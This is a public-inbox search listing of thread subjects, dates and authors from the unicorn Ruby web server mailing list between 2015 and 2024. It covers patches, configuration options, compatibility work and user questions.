2015-11-13  1:23     ` Eric Wong
2015-11-13 14:33       ` Jeff Utter
2015-11-13 20:54  3%     ` Eric Wong
2015-11-17 21:45  2% [PATCH] examples: add systemd socket and service files Eric Wong
2016-01-07  3:41  4% [PUSHED] various documentation updates Eric Wong
     [not found]     <56AAAD0A.8000807@icloud.com>
2016-01-30  9:34  0% ` unicorn log attack? Eric Wong
2016-02-01  5:04  2%   ` Lawrence Pit
2016-03-07 23:08     Systemd socket inheritance fails with “not a socket file descriptor” Amir Yalon
2016-03-08  3:31     ` Eric Wong
2016-03-08  7:45       ` Amir Yalon
2016-03-08 17:39         ` Eric Wong
2016-03-08 20:32  3%       ` Amir Yalon
2016-03-09  3:51  0%         ` Eric Wong
2016-03-09 13:19  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” [take2] Christos Trochalakis
2016-03-09 14:06  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” Christos Trochalakis
2016-04-15  3:26     Dead PostgreSQL connections on worker restart Adam Fields
2016-04-15  5:42  2% ` Eric Wong
     [not found]     <CAL-rKu6CZ731c=uHyZ8+Fg2fhC30e-3-J26XODacUK=YrfX+5Q@mail.gmail.com>
2016-06-07 13:41     ` [PATCH] `unicorn upgrade` script resilience against exceptions Eric Wong
2016-06-07 15:17       ` Jesper Rønn-Jensen
2016-06-07 21:13 10%     ` [PATCH] examples/init.sh: update to reduce upgrade raciness Eric Wong
2016-08-05 23:49     Please join the Rack Specification discussion for `env['upgrade.websocket']` Bo
2016-08-06  1:01     ` Eric Wong
2016-08-06  3:09  3%   ` Boaz Segev
2016-10-25 22:25  2% [PATCH] relocate website to https://bogomips.org/unicorn/ Eric Wong
2016-10-31 23:08     Master wait time metric Sam Saffron
2016-10-31 23:36  3% ` Eric Wong
2016-11-01  8:21  0%   ` Sam Saffron
2016-11-07 17:13  2% Build error of 5.1.0 due to RString Olivier FAURAX
2016-11-29  0:00  6% [RFC] TUNING: document THP caveat for Linux users Eric Wong
2017-02-21 19:19     Patch: Add after_worker_exit configuration option Jeremy Evans
2017-02-21 19:43  3% ` Eric Wong
2017-02-21 20:02  0%   ` Jeremy Evans
2017-02-21 19:24     Patch: Add support for chroot to Worker#user Jeremy Evans
2017-02-21 19:53     ` Eric Wong
2017-02-21 20:15  3%   ` Jeremy Evans
2017-02-22 12:02     check_client_connection using getsockopt(2) Simon Eskildsen
2017-02-22 18:33  2% ` Eric Wong
2017-02-22 20:09  2%   ` Simon Eskildsen
2017-02-23  1:42  2%     ` Eric Wong
2017-02-23  2:42  0%       ` Simon Eskildsen
2017-02-23  3:52  2%         ` Eric Wong
2017-02-23  0:49     Patch: Add after_worker_ready configuration option Jeremy Evans
2017-02-23  2:32     ` Eric Wong
2017-02-23  3:43  1%   ` Jeremy Evans
2017-02-23  9:23  2%     ` Eric Wong
2017-02-23 20:00  0%       ` Jeremy Evans
2017-02-25 14:03     [PATCH] check_client_connection: use tcp state on linux Simon Eskildsen
2017-02-25 16:19     ` Simon Eskildsen
2017-02-25 23:12       ` Eric Wong
2017-02-27 11:44         ` Simon Eskildsen
2017-02-28 21:12           ` Eric Wong
2017-03-01  3:18             ` Eric Wong
2017-03-06 21:32               ` Simon Eskildsen
2017-03-07 22:50                 ` Eric Wong
2017-03-08  0:26                   ` Eric Wong
2017-03-08 12:06                     ` Simon Eskildsen
2017-03-13 20:16  3%                   ` Simon Eskildsen
2017-03-08 18:44     [PATCH] Add worker_exec configuration option Jeremy Evans
2017-03-08 20:02     ` Eric Wong
2017-03-09 19:41       ` [PATCH] Add worker_exec configuration option V2 Jeremy Evans
2017-03-10 21:19         ` Eric Wong
2017-03-11  5:26           ` Jeremy Evans
2017-03-11  7:18  3%         ` Eric Wong
     [not found]     <20170316031652.17433-1-e@80x24.org>
2017-03-21  2:55  5% ` [PATCH (ccc)] http_request: support proposed Raindrops::TCP states on Eric Wong
2017-03-24 20:03  2% [PATCH] Check for SocketError on first ccc attempt Jeremy Evans
2017-04-04 14:08     after_worker_exit on murder Simon Eskildsen
2017-04-04 14:32  3% ` Jeremy Evans
2017-08-07 20:18     Random crash when sending USR2 + QUIT signals to Unicorn process Eric Wong
2017-10-03 14:52  3% ` Xuanzhong Wei
2017-10-03 17:15  0%   ` Eric Wong
2017-10-03 18:20  4%     ` Xuanzhong Wei
2017-10-19 17:42  4% Reaping process with unknown worker Alberto De Gaspari
2017-10-19 18:20  0% ` Eric Wong
2017-10-19 18:46       ` Alberto De Gaspari
2017-10-19 19:05         ` Eric Wong
2017-10-19 19:23  3%       ` Alberto De Gaspari
2017-10-19 19:37  0%         ` Eric Wong
2018-02-24  8:48  4% [PATCH] Send SIGTERM before SIGKILL on timeout Fumiaki MATSUSHIMA
2018-09-13 19:24     Make Worker#user support different process primary group and log file group Jeremy Evans
2018-09-13 22:53  3% ` Eric Wong
2018-11-07 23:38  2% [PATCH] doc: update more URLs to use HTTPS and avoid redirects Eric Wong
2018-12-13  1:07  6% [PATCH] doc/ISSUES: add links to git clone-able mail archives of our dependencies Eric Wong
     [not found]     <E5E85D7F-061C-422C-B02E-8FC248F87986@southofheaven.org>
     [not found]     ` <20190110200102.GA14520@portux.naturalnet.de>
2019-01-10 20:28       ` Bug#918916: Unicorn not reporting proper version for gemfile? Eric Wong
2019-01-12  9:42  3%     ` Hleb Valoshka
2019-01-12 10:04  0%       ` Dominik George
2019-03-06  1:47     Issues after 5.5.0 upgrade Stan Pitucha
2019-03-06  2:48     ` Eric Wong
2019-03-06  4:07       ` Stan Pitucha
2019-03-06  4:44         ` Eric Wong
2019-03-06  5:57  2%       ` Jeremy Evans
2019-05-12 22:25     [PATCH 0/3] slow clients and test/benchmark tools Eric Wong
2019-05-12 22:25  5% ` [PATCH 3/3] test/benchmark/uconnect: test for accept loop speed Eric Wong
2019-12-16 22:34  2% Traffic priority with Unicorn Bertrand Paquet
2019-12-17  5:12  0% ` Eric Wong
2019-12-18 22:06  0%   ` Bertrand Paquet
2020-01-14  7:46     [PATCH] doc: s/bogomips.org/yhbt.net/g Eric Wong
2020-01-14  7:46  1% ` Eric Wong
2020-08-06 21:46     Can Unicorn utilize HTTPS? Keven Sticher
2020-08-06 21:54  4% ` Eric Wong
2020-08-18 15:15     Connection issues between nginx and unicorn Michael Bernstein
2020-08-18 18:06  2% ` Eric Wong
2020-09-01 12:17     [PATCH] Update ruby_version requirement to allow ruby 3.0 Jean Boussier
2020-09-01 14:48     ` Eric Wong
2020-09-01 15:04       ` Jean Boussier
2020-09-01 15:41         ` Eric Wong
2020-09-03  7:52           ` Jean Boussier
2020-09-03  8:25             ` Eric Wong
2020-09-03  8:29               ` Jean Boussier
2020-09-03  9:31                 ` Eric Wong
2020-09-03 11:23  3%               ` Jean Boussier
2020-09-04 12:34                     ` Jean Boussier
2020-09-06  9:30                       ` Eric Wong
2020-09-07  7:13                         ` Jean Boussier
2020-09-08  2:24                           ` Eric Wong
2020-09-08  8:00                             ` Jean Boussier
2020-09-08  8:50  3%                           ` Eric Wong
2020-11-26 11:59     [RFC] http_response: ignore invalid header response characters Eric Wong
2021-01-06 17:53  2% ` Eric Wong
2021-01-13 23:20  1%   ` Sam Sanoop
2020-12-24 20:40  7% [PATCH] build: publish_doc: remove created.rid and index.html from site Eric Wong
     [not found]     <F6712BF3-A4DD-41EE-8252-B9799B35E618@github.com>
     [not found]     ` <20210311030250.GA1266@dcvr>
     [not found]       ` <7F6FD017-7802-4871-88A3-1E03D26D967C@github.com>
2021-03-12  9:41  1%     ` Potential Unicorn vulnerability Eric Wong
2021-03-13  2:08  3% [PATCH] test/test_helper: only unlink redirected logs from parent Eric Wong
2021-07-06  7:22  2% Formatting unicorn logs in json format for $stderr Cenon Del Rosario
2021-07-06 10:41  0% ` Eric Wong
2021-07-06 23:21  0%   ` Cenon Del Rosario
2021-10-01  3:09     [PATCH 0/6] reduce thundering herds on Linux 4.5+ Eric Wong
2021-10-01  3:09  1% ` [PATCH 6/6] use EPOLLEXCLUSIVE " Eric Wong
2021-12-25 17:41  3% [PATCH 0/3] Ruby 3.1 + doc/URL updates Eric Wong
2022-01-23 16:10  4% Memory usage enhancement in unicorn 6.1? Toshimaru Enomoto
2022-02-16 22:39  0% ` Eric Wong
2022-05-08  3:47     DKIM+DMARC enabled (for mailing list subscribers) Eric Wong
2022-06-22  8:44  3% ` Eric Wong
2022-07-05 20:05     [PATCH] Master promotion with SIGURG (CoW optimization) Jean Boussier
2022-07-06  2:33  2% ` Eric Wong
2022-07-06  7:40  1%   ` Jean Boussier
2022-07-07 10:23  0%     ` Eric Wong
     [not found]           ` <CANPRWbHTNiEcYq5qhN6Kio8Wg9a+2gXmc2bAcB2oVw4LZv8rcw@mail.gmail.com>
2022-07-08  0:30             ` Eric Wong
2022-07-08  6:22  2%           ` Jean Boussier
2022-09-21 22:16  0%             ` Eric Wong
2022-07-08 13:17  2% [PATCH] Get rid of Kgio Jean Boussier
2023-05-06 22:02     unicorn worker being killed issue subashkc1
2023-05-07 23:13     ` Eric Wong
2023-05-10 21:34  2%   ` subashkc1
2023-06-01 18:54     Rack 3 Compatibility Jeremy Evans
2023-06-02  0:00     ` Eric Wong
2023-06-02  2:45       ` Jeremy Evans
2023-06-05  9:12  3%     ` [PATCH v2] chunk unterminated HTTP/1.1 responses for Rack 3.1 Eric Wong
2023-06-05 10:32  1% [PATCH 00-23/23] start porting tests to Perl5 Eric Wong
2023-06-20 10:46  3% [PATCH] unicorn_http_common.rl: use only ASCII spaces for compatibility EW
2023-06-20 12:28  1% [PATCH] add chunk_response config directive " EW
2023-09-05  9:44  2% [RFC 0-3/3] depend on Ruby 2.5+, eliminate kgio Eric Wong
2024-03-23 19:45  4% [PATCH 0/4] a small pile of patches Eric Wong
2024-05-06 20:10  1% [PATCH 0/5..5/5] more tests to Perl 5 for stability Eric Wong

Code repositories for project(s) associated with this public inbox

	https://yhbt.net/unicorn.git/

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).